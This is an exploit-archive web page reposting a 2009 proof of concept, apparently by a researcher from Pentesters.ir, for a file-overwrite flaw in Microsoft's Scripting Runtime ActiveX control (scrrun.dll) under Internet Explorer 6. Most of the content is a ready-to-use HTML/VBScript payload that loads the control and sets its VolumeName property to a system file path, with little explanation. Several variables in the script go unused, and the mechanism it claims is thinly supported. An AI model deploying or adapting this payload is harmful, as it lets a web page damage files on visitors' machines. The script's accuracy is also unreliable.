首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Scripting Runtime Active-x (scrrun.dll) remote file overwrite exploit
来源:platen.gigfa.com 作者:PLATEN 发布时间:2009-08-24  
?<!--



MS Scripting Runtime ActiveX (scrrun.dll) Remote File Overwrite Exploit

############################################################
##        Pentesters Security Researching Group           ##
##               Www.Pentesters.iR                        ##
##               PLATEN " H.jafari "                      ##
##                                                        ##
## E-mail and blog:                                       ##
##                                                        ##
## platen.gigfa.com 		                          ##
## platen.secure[at]gmail[dot] com                        ## 
##                                                        ##
## Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake      ##
## and all members in Pentesters.ir                       ##
############################################################

Description:  scrrun.dll contains libraries for reading and writing scripts and text files.

vendor site: www.Microsoft.com
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6

Details
*******

This control contains two methods Property Let VolumeName  As String() that can be used to owervrite 
any file on OS

Property Let VolumeName  As String






-->

<html>

<object classid='clsid:C7C3F5B1-88A3-11D0-ABCB-00A0C90FFFC0' id='target' />
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\scrrun.dll"
prototype  = "Property Let VolumeName As String"
memberName = "VolumeName"
progid     = "Scripting.Drive"
argCount   = 1
arg1="c:\windows\system_.ini"
target.VolumeName = arg1

</script>
<html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD versions 6.1 and below
·Photodex ProShow Gold version
·Various BSD derived operating
·Discuz自定义模板变量漏洞
·Radix Antirootkit < 1.0.0.9 (S
·Linux Kernel 2.4/2.6 sock_send
·Linux Kernel 2.x sock_sendpage
·Ed Charkow's Supercharged Link
·VUPlayer <= 2.49 (.m3u File) U
·Photodex ProShow Gold 4 (.psh
·Traidnt UP 2.0 Remote SQL Inje
·KSP 2006 FINAL ( .M3U) Univers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved